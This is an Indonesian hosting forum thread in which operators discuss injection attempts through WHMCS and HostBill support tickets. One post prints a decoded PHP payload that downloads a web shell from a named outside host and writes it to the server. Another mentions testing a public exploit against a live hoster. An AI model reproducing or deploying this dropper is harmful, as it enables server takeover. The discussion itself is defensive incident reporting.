Injeksi lewat SUPPORT TICKET WHMCS

Adhie · 22 Mar 2012

derrimaulana said:
saya juga sering nih sekarang2, bukan ke WHMcs tapi ke hostbill

sukses gak?

)

derrimaulana · 22 Mar 2012

Adhie said:
sukses gak? )

kebetulan setiap ada ticket masuk dari user g jelas langsung delete dari phpmyadmin

soalnya nyantolnya kemana2, kaya di whmcs.

budiono · 22 Mar 2012

derrimaulana said:
kebetulan setiap ada ticket masuk dari user g jelas langsung delete dari phpmyadmin
soalnya nyantolnya kemana2, kaya di whmcs.

kalo yang itu tadi kodenya dimasukin di bagian SUBJECT dari tiket. Biasanya kan dimasukkan pada bagian tubuh/isi

drupadi · 24 Mar 2012

whmcs saya dapet juga nich

sepertinya saran dari mastah perlu di coba, cms harus dipisah accountnya dari billing.

capoengx · 24 Mar 2012

saya juga dapet ginian, kalau di decode hasilnya..

$code = file_get_contents('http://blogger.com.sahabatcahaya.net/text/wsob2.php'); $fo = fopen("wsob2.php","w"); fwrite($fo,$code);

dia generate php shell dengan nama file wsob2.php ambil content dari http://blogger.com.sahabatcahaya.net/text/wsob2.php nah kalau di whois hosting dia ada di servernya iixcyberhost.com, jadi mungkin kalau disini ada orang iixcyberhost.com bisa bantu hapus file tersebut di atas agar tidak merugikan teman2 yg lain.. thanks.

GriyaHosting · 3 Apr 2012

Ini sengaja atau ndak ya, sudah daftar client, kirim ticket base64, tapi ninggalin no HP,
First Name asdasdh
Last Name jh
Company Name hkj
Email Address [email protected]
Address 1 lkklashdkj
Address 2 hkjh
City kjhkj
State/Region hkjhkjhkjh
Postcode 8127389
Country ID - Indonesia
Phone Number 628971238978

mixmaxspace · 3 Apr 2012

hmm kalo saya juga bolak balik member baru yg iseng.
mana passwordnya: anjing (*jowo)
bolak balik. sampe blacklist total tuh IP

GriyaHosting · 3 Apr 2012

mixmaxspace said:
hmm kalo saya juga bolak balik member baru yg iseng.
mana passwordnya: anjing (*jowo)
bolak balik. sampe blacklist total tuh IP

hah lha kalau ip speedy di blaklis ?

JOGLOMedia · 4 Apr 2012

masalah percobaan injeksi whmcs ini, sampai sekarang saya masih dapat, barusan dapat beberapa kali email iseng seperti itu

capoengx said:
saya juga dapet ginian, kalau di decode hasilnya..

dia generate php shell dengan nama file wsob2.php ambil content dari hxxtp://blogger.com.sahabatcahaya.net/text/wsob2.php nah kalau di whois hosting dia ada di servernya iixcyberhost.com, jadi mungkin kalau disini ada orang iixcyberhost.com bisa bantu hapus file tersebut di atas agar tidak merugikan teman2 yg lain.. thanks.

kalau melihat dr polanya

hxxp://blogger.com.sahabatcahaya.net/text/wsob2.php

sepertinya itu injeksi yg dipakai buat script timthumb juga.

IDHORG · 10 Apr 2012

Sempet nonton kemarin vidio di youtube tentang exploit whmcs submit ticket,
nyobain di 1 hoster indo (ga bisa di sebetun) ternyata masih work,

di ver 4,

Langsung aja saya dapat vidio di : Whmcs submit ticket exploit - YouTube

makasih

Injeksi lewat SUPPORT TICKET WHMCS

Adhie

Expert 1.0

derrimaulana

Apprentice 2.0

budiono

Expert 1.0

drupadi

Apprentice 1.0

capoengx

Beginner 2.0

GriyaHosting

Expert 1.0

mixmaxspace

Hosting Guru

GriyaHosting

Expert 1.0

JOGLOMedia

Poster 2.0

IDHORG

Poster 1.0